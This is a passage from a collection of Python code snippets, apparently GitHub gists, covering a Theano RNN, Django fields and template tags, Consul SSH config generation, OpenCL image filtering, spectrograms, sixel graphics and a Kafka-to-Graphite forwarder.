return load(data_file)
def shared_identity(size, scale=1):
W = scale * np.eye(*size)
return shared(np.asarray(W, dtype=config.floatX))
def shared_gaussian(size, scale=0.001):
W = np.random.normal(scale=scale, size=size)
return shared(np.asarray(W, dtype=config.floatX))
def shared_constant(size, scale=0):
W = np.ones(shape=size, dtype=config.floatX) * scale
return shared(np.asarray(W, dtype=config.floatX))
class RecurrentLayer(object):
def __init__(self, input_size, output_size):
self.W = shared_gaussian((input_size, output_size))
self.W_hidden = shared_identity((output_size, output_size))
self.h = shared_constant((batch_size, output_size))
self.params = [self.W, self.W_hidden]
def __call__(self, x, h):
linear = T.dot(x, self.W) + T.dot(h, self.W_hidden)
return T.switch(linear > 0, linear, 0)
class SoftmaxLayer(object):
def __init__(self, input_size, output_size):
self.W = shared_gaussian((input_size, output_size))
self.b = shared_constant(output_size)
self.params = [self.W, self.b]
def __call__(self, x):
return T.nnet.softmax(T.dot(x, self.W) + self.b)
def get_cost(x, y):
x = x.T.reshape((784, -1, 1))
results, updates = scan(recurrent_layer, x, recurrent_layer.h)
predict_proba = softmax_layer(results[-1])
return T.nnet.categorical_crossentropy(predict_proba, y).mean(), \
T.mean(T.neq(T.argmax(predict_proba, axis=1), y))
def get_updates(cost, params):
for param, grad in zip(params, T.grad(cost, params)):
return [(param, param - learning_rate * T.clip(grad, -1, 1))]
def get_givens(X, y):
batch_start = i * batch_size
batch_end = (i+1) * batch_size
X = shared(np.asarray(X, config.floatX))
y = shared(np.asarray(y, 'int64'))
return {x: X[batch_start:batch_end],
t: y[batch_start:batch_end]}
if __name__ == '__main__':
X, y = load_mnist()[0]
from theano import tensor as T
x = T.matrix()
t = T.lvector()
i = T.lscalar()
learning_rate = 1e-8
batch_size = 16
recurrent_layer = RecurrentLayer(1, 100)
softmax_layer = SoftmaxLayer(100, 10)
cost, prediction_error = get_cost(x, t)
params = recurrent_layer.params + softmax_layer.params
updates = get_updates(cost, params)
givens = get_givens(X, y)
from theano import function
fit = function([i], prediction_error, givens=givens)
n_batches = len(X) / batch_size
n_epochs = 1000
for epoch in range(n_epochs):
cost = []
for batch in range(n_batches):
cost.append(fit(batch))
print np.mean(cost)
```
#### File: hard-gists/3599025/snippet.py
```python
from urllib.request import urlopen
import json
gist_description = "does stuff"
gist_filename = 'file1_upload_to_github.py'
gist_body = """\
line1
line2
line3
line4
"""
def main_function(gist_filename, gist_description, gist_body):
gist_post_data = { 'description': gist_description,
'public': True,
'files': {gist_filename: {'content': gist_body}}}
json_post_data = json.dumps(gist_post_data).encode('utf-8')
def get_gist_url(found_json):
wfile = json.JSONDecoder()
wjson = wfile.decode(found_json)
print('https://gist.github.com/' + wjson['id'])
def upload_gist():
print('sending')
url = 'https://api.github.com/gists'
json_to_parse = urlopen(url, data=json_post_data)
print('received response from server')
found_json = json_to_parse.readall().decode()
get_gist_url(found_json)
upload_gist()
main_function(gist_filename, gist_description, gist_body)
```
#### File: hard-gists/3685134/snippet.py
```python
import re
from django import forms
from django.db import models
class ColourFormField(forms.IntegerField):
default_error_messages = {
'invalid': 'Enter a valid colour value: e.g. "#ff0022"',
}
def __init__(self, *args, **kwargs):
super(ColourFormField, self).__init__(*args, **kwargs)
def clean(self, value):
if value == '' and not self.required:
return u''
if not re.match('^#([A-Fa-f0-9]{6}|[A-Fa-f0-9]{3})$', value):
raise forms.ValidationError(self.error_messages['invalid'])
value = int(value[1:], 16)
super(ColourFormField, self).clean(value)
return value
class ColourField(models.PositiveIntegerField):
description = "HEX value for a colour"
def __init__(self, *args, **kwargs):
kwargs['max_length'] = 6
super(ColourField, self).__init__(*args, **kwargs)
def to_python(self, value):
super(ColourField, self).to_python(value)
try:
string = hex(value)[2:]
if string == "0":
string = "000000"
return "#"+string.upper()
except TypeError:
return None
def get_prep_value(self, value):
try:
# hex to int, save the int representation of the colour hex code to the database
return value
except ValueError:
return None
def formfield(self, *args, **kwargs):
kwargs['form_class'] = ColourFormField
return super(ColourField, self).formfield(*args, **kwargs)
```
#### File: hard-gists/36e652488563ab23ea04/snippet.py
```python
import argparse
import glob
import json
import os
import shutil
from http.client import HTTPConnection
class Client(object):
def __init__(self, host):
self.connection = HTTPConnection(host, timeout=10)
def open(self, method, url, body=None, headers={}):
self.connection.request(method, url, body, headers)
response = self.connection.getresponse()
return json.loads(response.read().decode())
def get(self, url):
return self.open('GET', url)
class SshHost(object):
def __init__(self, host, ssh_user, hostname):
self.host = host
self.ssh_user = ssh_user
self.hostname = hostname
class Inventory(object):
def __init__(self, ssh_user):
self.services = {}
self.ssh_user = ssh_user
def add_service(self, dc, name, address):
service = '%s-%s' % (dc, name)
self.services.setdefault(service, [])
host = '%s-%s' % (service, address.replace('.', '-'))
ssh_host = SshHost(host, self.ssh_user, address)
self.services[service].append(ssh_host)
def __iter__(self):
for services in self.services.values():
for ssh_host in services:
yield ssh_host
class App(object):
def __init__(self, consul, ssh_user, merge):
self.client = Client(consul)
self.merge = merge
self.inventory = Inventory(ssh_user)
def get_datacenters(self):
return self.client.get('/v1/catalog/datacenters')
def get_nodes(self, dc=''):
return self.client.get('/v1/catalog/nodes?dc=%s' % dc)
def get_node(self, node, dc=''):
return self.client.get('/v1/catalog/node/%s?dc=%s' % (node['Node'], dc))
def get_node_services(self, node):
return [s['Service'] for s in node['Services'].values()]
def get_inventory(self):
for dc in self.get_datacenters():
for node in self.get_nodes(dc):
node = self.get_node(node, dc)
for service in self.get_node_services(node):
self.inventory.add_service(dc, service, node['Node']['Address'])
def write_config(self):
ssh_dir = os.path.join(os.environ['HOME'], '.ssh')
main_config_path = os.path.join(ssh_dir, 'config')
main_config_backup_path = os.path.join(ssh_dir, 'config.old')
consul_config_path = os.path.join(ssh_dir, 'consul.config')
merge_files = os.path.join(ssh_dir, self.merge)
with open(consul_config_path, 'w') as f:
for ssh_host in self.inventory:
f.write('Host %s\n' % ssh_host.host)
f.write(' Hostname %s\n' % ssh_host.hostname)
f.write(' User %s\n\n' % ssh_host.ssh_user)
shutil.copyfile(main_config_path, main_config_backup_path)
with open(main_config_path, 'w') as ssh_config:
for fn in glob.glob(merge_files):
with open(fn, 'r') as config:
ssh_config.write(config.read())
print('config written to %s' % main_config_path)
def run(self):
self.get_inventory()
self.write_config()
def main():
parser = argparse.ArgumentParser()
parser.add_argument(
'-c', '--consul', default='localhost:8500',
help='The Consul host to connect to. Defaults to localhost:8500')
parser.add_argument(
'-u', '--ssh-user', default=os.getlogin(),
help='The SSH user to specify for all hosts. Defaults to %s' % os.getlogin())
parser.add_argument(
'-m', '--merge', default='*.config',
help='A glob pattern to specify files to collect and merge into the main config. '
'Defaults to "*.config"')
args = parser.parse_args()
App(args.consul, args.ssh_user, args.merge).run()
if __name__ == '__main__':
main()
```
#### File: hard-gists/3714115/snippet.py
```python
import re
from django.template import Library, Node, TemplateSyntaxError
from urlparse import urlparse, parse_qsl, urlunparse
from django.utils.encoding import smart_str
from urllib import urlencode
register = Library()
@register.tag
def qurl(parser, token):
"""
Append, remove or replace query string parameters from an url (preserve order)
{% qurl url [param]* [as <var_name>] %}
param:
name=value: replace all values of name by one value
name=None: remove all values of name
name+=value: append a new value for name
name-=value: remove the value of name with the value
Example::
{% qurl '/search?page=1&color=blue&color=green' order='name' page=None color+='red' color-='green' %}
Output: /search?color=blue&order=name&color=red
{% qurl request.get_full_path order='name' %}
"""
bits = token.split_contents()
if len(bits) < 2:
raise TemplateSyntaxError("'%s' takes at least one argument (url)" % bits[0])
url = parser.compile_filter(bits[1])
asvar = None
bits = bits[2:]
if len(bits) >= 2 and bits[-2] == 'as':
asvar = bits[-1]
bits = bits[:-2]
qs = []
if len(bits):
kwarg_re = re.compile(r"(\w+)(\-=|\+=|=)(.*)")
for bit in bits:
match = kwarg_re.match(bit)
if not match:
raise TemplateSyntaxError("Malformed arguments to url tag")
name, op, value = match.groups()
qs.append((name, op, parser.compile_filter(value),))
return QURLNode(url, qs, asvar)
class QURLNode(Node):
"""Implements the actions of the qurl tag."""
def __init__(self, url, qs, asvar):
self.url = url
self.qs = qs
self.asvar = asvar
def render(self, context):
urlp = list(urlparse(self.url.resolve(context)))
qp = parse_qsl(urlp[4])
for name, op, value in self.qs:
name = smart_str(name)
value = value.resolve(context)
value = smart_str(value) if value is not None else None
if op == '+=':
qp = filter(lambda (n, v): not(n == name and v == value), qp)
qp.append((name, value,))
elif op == '-=':
qp = filter(lambda (n, v): not(n == name and v == value), qp)
elif op == '=':
qp = filter(lambda (n, v): not(n == name), qp)
if value is not None:
qp.append((name, value,))
urlp[4] = urlencode(qp, True)
url = urlunparse(urlp)
if self.asvar:
context[self.asvar] = url
return ''
else:
return url
```
#### File: hard-gists/3735779/snippet.py
```python
import sys
import time
from PyQt4 import QtCore
from PyQt4 import QtGui
import pyopencl as cl
import numpy
CL_SOURCE = '''//CL//
__kernel void convert(
read_only image2d_t src,
write_only image2d_t dest,
const int width,
const int height
)
{
const sampler_t sampler = CLK_NORMALIZED_COORDS_FALSE | CLK_ADDRESS_CLAMP_TO_EDGE | CLK_FILTER_NEAREST;
int2 pos = (int2)(get_global_id(0), get_global_id(1));
uint4 pix = 4 * read_imageui(src, sampler, pos);
pix += read_imageui(src, sampler, (int2)(pos.x - 1, pos.y - 1));
pix += read_imageui(src, sampler, (int2)(pos.x - 1, pos.y)) * 2;
pix += read_imageui(src, sampler, (int2)(pos.x - 1, pos.y + 1));
pix += read_imageui(src, sampler, (int2)(pos.x , pos.y - 1)) * 2;
pix += read_imageui(src, sampler, (int2)(pos.x , pos.y + 1)) * 2;
pix += read_imageui(src, sampler, (int2)(pos.x + 1, pos.y - 1));
pix += read_imageui(src, sampler, (int2)(pos.x + 1, pos.y)) * 2;
pix += read_imageui(src, sampler, (int2)(pos.x + 1, pos.y + 1));
//pix /= (uint4)(16, 16, 16, 16);
pix.x /= 16;
pix.y /= 16;
pix.z /= 16;
pix.w /= 16;
write_imageui(dest, pos, pix);
}
'''
class Widget(QtGui.QWidget):
def __init__(self, parent=None):
self.ctx = cl.create_some_context()
self.queue = cl.CommandQueue(self.ctx)
self.prg = cl.Program(self.ctx, CL_SOURCE).build()
super(Widget, self).__init__(parent)
self.setWindowTitle('Gaussian Filter')
self.resize(300, 300)
self.setAcceptDrops(True)
self.image_label = QtGui.QLabel('Drag & drop image here')
layout = QtGui.QHBoxLayout()
layout.addWidget(self.image_label)
self.setLayout(layout)
def dragEnterEvent(self, event):
if event.mimeData().hasUrls():
event.accept()
else:
event.ignore()
def dropEvent(self, event):
filename = event.mimeData().urls()[0].path()
img = QtGui.QImage(filename)
start = time.time()
image = self.convert(img)
stop = time.time()
#print 'processing time', stop - start
pixmap = QtGui.QPixmap()
pixmap.convertFromImage(image)
self.image_label.setPixmap(pixmap)
def convert(self, img):
src = numpy.fromstring(img.bits().asstring(img.byteCount()), dtype=numpy.uint8)
src.shape = h, w, _ = img.height(), img.width(), 4
mf = cl.mem_flags
src_buf = cl.image_from_array(self.ctx, src, 4)
fmt = cl.ImageFormat(cl.channel_order.RGBA, cl.channel_type.UNSIGNED_INT8)
dest_buf = cl.Image(self.ctx, mf.WRITE_ONLY, fmt, shape=(w, h))
self.prg.convert(self.queue, (w, h), None, src_buf, dest_buf, numpy.int32(w), numpy.int32(h))
dest = numpy.empty_like(src)
cl.enqueue_copy(self.queue, dest, dest_buf, origin=(0, 0), region=(w, h))
return QtGui.QImage(str(dest.data), w, h, QtGui.QImage.Format_RGB32)
if __name__ == '__main__':
app = QtGui.QApplication(sys.argv)
window = Widget()
window.show()
sys.exit(app.exec_())
```
#### File: hard-gists/3760670/snippet.py
```python
from java.io import File
from java.io import FileInputStream
from java.util import Properties
#Load properties file in java.util.Properties
def loadPropsFil(propsFil):
properties={}
propFil = Properties()
propFil.load(FileInputStream(propsFil))
properties.update(propFil)
return properties
propertyfile='/opt/data/myfile.properties'
properties = loadPropsFil(propertyfile)
for key, value in properties.iteritems():
print "%s=%s" % (key, value)
dictName="MyDictDev2"
dictId='Environments/%s'%dictName
if repository.exists(dictId):
print "update dictionary '%s'" % dictId
dict=repository.read(dictId)
dict.values['entries'].putAll(properties)
repository.update(dict)
else:
print "new dictionary created '%s'" % dictId
dict=repository.create(factory.configurationItem(dictId, 'udm.Dictionary', {'entries':properties}))
```
#### File: hard-gists/3772157/snippet.py
```python
import numpy
import scipy
import matplotlib.pyplot as pyplot
def decibel(lin):
"""Convert amplitude to decibel.
We might later need power to decibel..."""
return 20*numpy.log10(norm(lin))
def norm(sig):
"""Normalisze signal."""
sig_max = numpy.float(
numpy.max(
numpy.abs(sig)
)
)
return sig / sig_max
def stft(
x,
fs,
framesz,
hop
):
"""Short time fourier transform.
x : signal.
fs : sampling frequency.
framesz : short time window size in seconds (y-resolution).
hop : window movement in seconds (x-resolution).
"""
framesamp = int(framesz*fs)
hopsamp = int(hop*fs)
w = scipy.hamming(framesamp)
X = scipy.array([scipy.fft(w*x[i:i+framesamp])
for i in range(
0,
len(x)-framesamp,
hopsamp
)])
return X
def logarithmicPrune(
spec,
y,
size
):
"""Does a logarithmic prune. Removes rows from a spectrogram in a logarithmic
fashion. It should improove performance of plotting functions. In the higher
frequencies more rows are pruned than in the lower. Making the distribution
of rows linear again.
We prune the spectogram and the y-axis with the same function, in order to
avoid mismatchs.
spec : The spectogram to prune.
y : The y-axis that belongs to that spectrum.
size : The new size of the array."""
# Allocate lists
speclist = size*[None]
ylist = size*[None]
i_max = len(spec)
# Calculate the scaling of the indexs during prune
# TODO: I have abosultly no idea why I need sqrt. Would be nice to
# understand what I am doing.
scale = (i_max) / numpy.exp(numpy.sqrt(size-1))
index = 0
# Slice the spectrogram and select rows.
for i in range(0, size):
speclist[i] = spec[int(index)].copy()
ylist[i] = y[int(index)].copy()
exp_val = numpy.exp(numpy.sqrt(i)) * scale
# If the resample index didn't grow a while integer, we enforce that.
if exp_val < (index + 1):
index += 1
else:
index = int(exp_val)
return (
numpy.array(speclist),
numpy.array(ylist)
)
def spectrogram(
data,
fs,
framesz=0.5,
hop=0.01,
yprune=600,
fmax = None
):
"""Display a spectrograph.
data : signal.
fs : sampling frequency.
framesz : short time window size in seconds (y-resolution).
hop : window movement in seconds (x-resolution).
yprune : y-resolution in rows (Should be more than target the resolution).
fmax : Max frequency to display. Cuts the spectrogram."""
C = stft(data, fs, framesz, hop).T
# Set ylen from fmax if provided.
if fmax == None:
fmax = fs/2
ylen = fmax/2
# Cut the unwanted frequecies.
C = C[1:ylen]
# Get the len from the new array (just to be sure).
ylen = len(C)
# Create a linear space for the x-axis.
x = numpy.linspace(
0,
len(data)/fs,
len(C[0])
)
# Create logarithmic space for the y-axis.
y = numpy.log(numpy.linspace(
1,
fmax,
ylen
))
# Prune the the lines that are beyond resolution.
(d, y) = logarithmicPrune(
C,
y,
yprune
);
# Convert amplitudes to decibel
d = decibel(numpy.absolute(d))
# Create a meshgrid for the plotting function. This is a format conversion.
X, Y = numpy.meshgrid(x, y);
# Plot and set labels
pyplot.pcolor(X, Y, d);
pyplot.ylabel("Frequency (Hz) ");
pyplot.xlabel('Time (seconds)');
ax = pyplot.gca()
liny = numpy.linspace(
1,
numpy.log(fmax),
10
)
# Set the ticks along the log-space
ax.set_yticks(liny)
# The tick labes must be frequencies, so we have to invert log again.
ax.set_yticklabels(["%.2f" % x for x in numpy.exp(liny)])
# Colorbar with label.
pyplot.colorbar().set_label("Amplitude (dB)")
return C.shape
```
#### File: hard-gists/3806329/snippet.py
```python
import sys, termios, StringIO
import Image # PIL
class SixelConverter:
def __init__(self, image, f8bit = False):
if f8bit: # 8bit mode
self.DCS='\x90'
self.ST='\x9c'
else:
self.DCS='\x1bP'
self.ST='\x1b\\'
self.palette = image.getpalette()
self.data = image.getdata()
self.width, self.height = image.size
def __write_header(self, output):
# start Device Control String (DCS)
output.write(self.DCS)
# write header
output.write('0;0;8q"1;1')
def __write_palette_section(self, output):
palette = self.palette
# write palette section
for i in range(0, len(palette), 3):
output.write('#' + str(i / 3) + ";2;")
output.write(str(palette[i] * 100 / 256) + ";")
output.write(str(palette[i + 1] * 100 / 256) + ";")
output.write(str(palette[i + 2] * 100 / 256))
def __write_body_section(self, output):
data = self.data
#write body section
height = self.height
width = self.width
for y in range(0, height):
cachedNo = data[y * width]
count = 1
for x in range(0, width):
colorNo = data[y * width + x]
if colorNo == cachedNo:
count += 1
continue
c = chr(pow(2, y % 6) + 63)
if count > 1:
output.write('#' + str(cachedNo) + '!' + str(count) + c)
count = 1
else:
output.write('#' + str(cachedNo) + c)
cachedNo = colorNo
if count > 1:
output.write('#' + str(cachedNo) + '!' + str(count) + c)
else:
output.write('#' + str(cachedNo) + c)
output.write('$') # write line terminator
if y % 6 == 5:
output.write('-') # write sixel line separator
def __write_terminator(self, output):
# write ST
output.write(self.ST) # terminate Device Control String
def getvalue(self):
output = StringIO.StringIO()
try:
self.__write_header(output)
self.__write_palette_section(output)
self.__write_body_section(output)
self.__write_terminator(output)
value = output.getvalue()
finally:
output.close()
return value
class CellSizeDetector:
def __set_raw(self):
fd = sys.stdin.fileno()
backup = termios.tcgetattr(fd)
try:
new = termios.tcgetattr(fd)
new[0] = 0 # c_iflag = 0
# new[3] = 0 # c_lflag = 0
new[3] = new[3] &~ (termios.ECHO | termios.ICANON)
termios.tcsetattr(fd, termios.TCSANOW, new)
except:
termios.tcsetattr(fd, termios.TCSANOW, backup)
return backup
def __reset_raw(self, old):
fd = sys.stdin.fileno()
termios.tcsetattr(fd, termios.TCSAFLUSH, old)
def __get_report(self, query):
sys.stdout.write(query)
result = ''
while True:
c = sys.stdin.read(1)
if c == 't':
break
result += c
return result
def get_size(self):
backup_termios = self.__set_raw()
try:
(height, width) = self.__get_report("\x1b[14t").split(';')[1:]
(row, column) = self.__get_report("\x1b[18t").split(';')[1:]
char_width = int(width) / int(column)
char_height = int(height) / int(row)
finally:
self.__reset_raw(backup_termios)
return char_width, char_height
class SixelWriter:
def __init__(self, f8bit = False):
if f8bit: # 8bit mode
self.CSI='\x9b'
else:
self.CSI='\x1b['
def save_position(self):
sys.stdout.write('\x1b7')
def restore_position(self):
sys.stdout.write('\x1b8')
def move_x(self, n, fabsolute):
sys.stdout.write(self.CSI)
if fabsolute:
sys.stdout.write(str(n) + '`')
else:
if n > 0:
sys.stdout.write(str(n) + 'C')
elif n < 0:
sys.stdout.write(str(-n) + 'D')
def move_y(self, n, fabsolute):
sys.stdout.write(self.CSI)
if fabsolute:
sys.stdout.write(str(n) + 'd')
else:
if n > 0:
sys.stdout.write(str(n) + 'B')
elif n < 0:
sys.stdout.write(str(-n) + 'A')
def draw(self, filename, abs, x = None, y = None, w = None, h = None):
image = Image.open(filename)
image = image.convert("P")
if not (w is None and h is None):
width, height = image.size
if w == None:
h = height
if h == None:
w = width
print h,'-', w
image = image.resize((w, h))
self.save_position()
try:
if not x is None:
self.move_x(x, abs)
if not y is None:
self.move_y(y, abs)
sixel_converter = SixelConverter(image, options.f8bit)
sys.stdout.write(sixel_converter.getvalue())
finally:
self.restore_position()
if __name__ == '__main__':
import optparse, re
parser = optparse.OptionParser()
parser.add_option("-8", "--8bit-mode",
action="store_true",
dest="f8bit",
help="Generate a sixel image for 8bit terminal or printer")
parser.add_option("-7", "--7bit-mode",
action="store_false",
dest="f8bit",
help="Generate a sixel image for 7bit terminal or printer")
parser.add_option("-r", "--relative-position",
default=False,
action="store_false",
dest="fabsolute",
help="Treat specified position as relative one")
parser.add_option("-a", "--absolute-position",
action="store_true",
dest="fabsolute",
help="Treat specified position as absolute one")
parser.add_option("-x", "--left",
dest="left",
help="Left position in cell size, or pixel size with unit 'px'")
parser.add_option("-y", "--top",
dest="top",
help="Top position in cell size, or pixel size with unit 'px'")
parser.add_option("-w", "--width",
dest="width",
help="Width in cell size, or pixel size with unit 'px'")
parser.add_option("-e", "--height",
dest="height",
help="Height in cell size, or pixel size with unit 'px'")
options, args = parser.parse_args()
filename = args[0]
char_width, char_height = CellSizeDetector().get_size()
left = options.left
if not left is None:
pos = left.find("px")
if pos == len(left) - 2:
left = int(left[:pos]) / char_width
else:
left = int(left)
top = options.top
if not top is None:
pos = top.find("px")
if pos == len(top) - 2:
top = int(top[:pos]) / char_width
else:
top = int(top)
width = options.width
if not width is None:
pos = width.find("px")
if pos == len(width) - 2:
width = int(width[:pos])
else:
width = int(width) * char_width
height = options.height
if not height is None:
pos = height.find("px")
if pos == len(height) - 2:
height = int(height[:pos])
else:
height = int(height) * char_height
writer = SixelWriter(options.f8bit)
writer.draw(filename, abs = options.fabsolute,
x = left, y = top, w = width, h = height)
```
#### File: hard-gists/3832818/snippet.py
```python
from optparse import make_option
from django.core.management.base import BaseCommand, CommandError
from django.contrib.sites.models import Site
from django.db import transaction
from cms.models import Page
class Command(BaseCommand):
help = 'Copy the CMS pagetree from a specific SITE_ID.'
option_list = BaseCommand.option_list + (
make_option('--from', dest='from_site', default=None,
help='Specifies the SITE_ID to copy from.'),
make_option('--to', dest='to_site', default=None,
help='Specifies the SITE_ID to copy to.')
)
def handle(self, *args, **options):
from_site = options.get('from_site', None)
to_site = options.get('to_site', None)
if not from_site or not to_site:
raise CommandError("You must use --from and --to to use this command.")
self.get_site(from_site)
site = self.get_site(to_site)
pages = Page.objects.filter(site=from_site, level=0)
with transaction.commit_on_success():
for page in pages:
page.copy_page(None, site)
Page.objects.filter(site=to_site).update(published=True)
self.stdout.write("Copied CMS Tree from SITE_ID {0} successfully to SITE_ID {1}.\n".format(from_site, to_site))
def get_site(self, site_id):
try:
return Site.objects.get(pk=site_id)
except Site.DoesNotExist:
raise CommandError("\nUnknown site: {0}. Please create a new site first.\n".format(site_id))
```
#### File: hard-gists/3834979/snippet.py
```python
from django.template import Library, Node, Variable, \
VariableDoesNotExist, TemplateSyntaxError
register = Library()
def get_var(v, context):
try:
return v.resolve(context)
except VariableDoesNotExist:
return v.var
class ReplaceNode(Node):
def __init__(self, s, old, new):
self.s = Variable(s)
self.old = Variable(old)
self.new = Variable(new)
def render(self, context):
s = unicode(get_var(self.s, context))
old = unicode(get_var(self.old, context))
new = unicode(get_var(self.new, context))
return s.replace(old, new)
@register.tag
def replace(parser, token):
args = token.split_contents()[1:]
if len(args) != 3:
raise TemplateSyntaxError, '%r tag requires a string, an old value, and a new value.' % token.contents.split()[0]
return ReplaceNode(*args)
```
#### File: hard-gists/3931936/snippet.py
```python
from optparse import OptionParser
from brod.zk import *
import pickle
import struct
import socket
import sys
import time
class Graphite:
def __init__(self, host='localhost', port=2004, retry=5, delay=3, backoff=2, timeout=10):
self.host = host
self.port = port
self.retry = retry
self.delay = delay
self.backoff = backoff
self.timeout = timeout
# Create initial socket
self.conn = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.conn.settimeout(self.timeout)
# Initiate connection
self.connect()
def _backoff(self, retry, delay, backoff):
"""Exponential backoff."""
retry -= 1
if retry == 0:
raise Exception('Timeout')
time.sleep(delay)
delay *= backoff
return retry, delay, backoff
def _retry(self, exception, func, *args):
"""Retry calling the func catching a tuple of exceptions with backoff."""
retry = self.retry
delay = self.delay
backoff = self.backoff
while retry > 0:
try:
return func(*args)
except exception, e:
retry, delay, backoff = self._backoff(retry, delay, backoff)
def connect(self):
"""Connect to graphite."""
retry = self.retry
backoff = self.backoff
delay = self.delay
while retry > 0:
try:
# Attempt to connect to Graphite, break if success
self.conn.connect((self.host, self.port))
break
except socket.error, e:
# Ditch this socket. Create a new one
self.conn.close()
self.conn.connect()
retry, delay, backoff = self._backoff(retry, delay, backoff)
def close(self):
"""Close connection go Graphite."""
self.conn.close()
def send(self, data, retry=3):
"""Send data to graphite."""
retry = self.retry
backoff = self.backoff
delay = self.delay
# Attempt to send any data in the queue
while retry > 0:
# Check socket
if not self.conn:
# Attempt to restablish connection
self.close()
self.connect()
retry, delay, backoff = self._backoff(retry, delay, backoff)
continue
try:
# Send data to socket
self.conn.sendall(data)
break
except socket.error, e:
self.close()
self.connect()
retry, delay, backoff = self._backoff(retry, delay, backoff)
continue
def _pickle(batch):
"""Pickle metrics into graphite format."""
payload = pickle.dumps(batch)
header = struct.pack("!L", len(payload))
message = header + payload
return message
def _convert(msg):
"""Convert a graphite key value string to pickle."""
path, timestamp, value = msg.split(' ')
m = (path, (timestamp, value))
return m
def _connect_zookeeper(zk, group, topic, autocommit=True):
"""Connect to ZooKeeper ensemble."""
consumer = ZKConsumer(zk, group, topic, autocommit)
return consumer
if __name__ == "__main__":
batch = []
parser = OptionParser()
parser.add_option("-z", "--zk", dest="zookeeper", default="localhost:2181", help="Kafka ZooKeeper quorum")
parser.add_option("-t", "--topic", dest="topic", help="Kafka topic")
parser.add_option("-c", "--consumer", dest="consumer_group", default="graphite", help="Kafka consumer group")
parser.add_option("-H", "--host", dest="graphite_host", default="localhost", help="Graphite host")
parser.add_option("-p", "--port", dest="graphite_port", type=int, default=2004, help="Graphite port")
parser.add_option("-k", "--pickle", dest="pickle_batch", action="store_true", help="Pickle the graphite batches")
parser.add_option("-b", "--batch", dest="batch_size", type=int, default=200, help="Graphite pickle batch size")
parser.add_option("-i", "--interval", dest="poll", type=int, default=15, help="Poll interval for Kafaka topic")
(options, args) = parser.parse_args()
# Assign OptParse variables
consumer_group = options.consumer_group
topic = options.topic
zookeeper = options.zookeeper
batch_size = options.batch_size
pickle_batch = options.pickle_batch
host = options.graphite_host
port = options.graphite_port
poll = options.poll
# Connect to Graphite
try:
graphite = Graphite(host, port)
except socket.error, e:
print "Could not connect to graphite host %s:%s" % (host, port)
sys.exit(1)
except socket.gaierror, e:
print "Invalid hostname for graphite host %s" % (host)
sys.exit(1)
# Connect to ZooKeeper
try:
consumer = _connect_zookeeper(zookeeper, consumer_group, topic)
except ZKConnectError, e:
print "Could not connect to zookeeper ensemble %s" % (zookeeper)
sys.exit(1)
# Consume Kafka topic
for msg_set in consumer.poll(poll_interval=poll):
for offset, msg in msg_set:
if pickle_batch:
# Convert metric to Pickle format, and append batch
batch.append(_convert(msg))
else:
# Append string to list
batch.append(msg)
# Check to see if we should send metrics to Graphite
if len(batch) >= batch_size:
# Pickle metrics if set to true
if pickle_batch:
# Pickle graphite batch
pickled = _pickle(batch)
graphite.send(pickled)
else:
# Send metrics to Graphite. Convert list to string
graphite.send("\n".join(batch))
# Clear batch. Successfully sent
print "Sent %s metrics to Graphite" % (len(batch))
batch = []
```
#### File: hard-gists/3946121/snippet.py
```python
import sys
import colorsys
from colorz import colorz
WALLPAPER = '/home/james/.wallpaper'
COLORS = '/home/james/.colors'
XRESOURCES = '/home/james/.Xresources'
cols = ''
xres = """
URxvt.font: -*-unifont-medium-*-*-*-16-*-*-*-*-*-*-*
URxvt.boldFont: -*-unifont-medium-*-*-*-16-*-*-*-*-*-*-*
URxvt.perl-ext-common: default,keyboard-select,url-select,clipboard
URxvt.modifier: super
! Original Colors
! urxvt*color8: #4DA869
! urxvt*color9: #EF2929
! urxvt*color10: #BDA2BF
! urxvt*color11: #FFF391
! urxvt*color12: #7587A6
! urxvt*color13: #F0C47B
! urxvt*color14: #FF4040
! urxvt*color15: #EEEEEC
! urxvt*color0: #2E3436
! !urxvt*color0: #000000
! urxvt*color1: #DD1144
! urxvt*color2: #9B859D
! urxvt*color3: #F9EE98
! urxvt*color4: #424D5E
! urxvt*color5: #CDA869
! urxvt*color6: #E94444
! urxvt*color7: #C2C2C2
! Keyboard select
URxvt.keysym.M-Escape: perl:keyboard-select:activate
URxvt.keysym.M-s: perl:keyboard-select:search
! URL select
URxvt.keysym.M-u: perl:url-select:select_next
URxvt.url-select.autocopy: true
URvxt.url-select.button: 1
URvxt.url-select.launcher: mimeo
URxvt.url-select.underline: true
! Clipboard
URxvt.keysym.M-c: perl:clipboard:copy
URxvt.keysym.M-v: perl:clipboard:paste
URxvt.keysym.M-C-v: perl:clipboard:paste_escaped
URxvt.foreground: #ffffff
URxvt.scrollBar: false
URxvt.depth: 32
URxvt.background: [85]#0E0E0E
! Colorz
"""
def normalize(hexv, minv=128, maxv=256):
hexv = hexv[1:]
r, g, b = (
int(hexv[0:2], 16) / 256.0,
int(hexv[2:4], 16) / 256.0,
int(hexv[4:6], 16) / 256.0,
)
h, s, v = colorsys.rgb_to_hsv(r, g, b)
minv = minv / 256.0
maxv = maxv / 256.0
if v < minv:
v = minv
if v > maxv:
v = maxv
r, g, b = colorsys.hsv_to_rgb(h, s, v)
return '#{:02x}{:02x}{:02x}'.format(int(r * 256), int(g * 256), int(b * 256))
if __name__ == '__main__':
if len(sys.argv) == 1:
n = 16
else:
n = int(sys.argv[1])
i = 0
with open('colorz.html', 'w') as f:
f.write("""<img src="file://{}" height=200/>""".format(WALLPAPER))
for c in colorz(WALLPAPER, n=n):
# if i == 8:
# i += 1
if i == 0:
c = normalize(c, minv=0, maxv=32)
elif i == 8:
c = normalize(c, minv=128, maxv=192)
elif i < 8:
c = normalize(c, minv=160, maxv=224)
else:
c = normalize(c, minv=200, maxv=256)
f.write("""
<div style="background-color: {0}; width: 100%; height: 50px">{1}: {0}</div>
""".format(c, i)
)
xres += """urxvt*color{}: {}\n""".format(i, c)
cols += """export COLOR{}="{}"\n""".format(i, c)
i += 1
with open(XRESOURCES, 'w') as f:
f.write(xres)
with open(COLORS, 'w') as f:
f.write(cols)
```
#### File: hard-gists/398429347c96e98aba88/snippet.py
```python
import concurrent.futures
import operator
import sys
from queue import Queue
import pafy
import requests
q = Queue()
#conf = "europython-2014"
#conf = "pycon-us-2014"
#conf = "pycon-us-2013"
#conf = "pycon-us-2012"
conf = "pycon-us-2015"
conf_url = "http://pyvideo.org/api/v2/category/{conf}?format=json".format(conf=conf)
class Video():
def __init__(self, url):
self.json_url = "{url}?format=json".format(url=url)
r = requests.get(self.json_url)
self.d = r.json()
self.youtube_link = self.d["source_url"]
self.process(self.youtube_link)
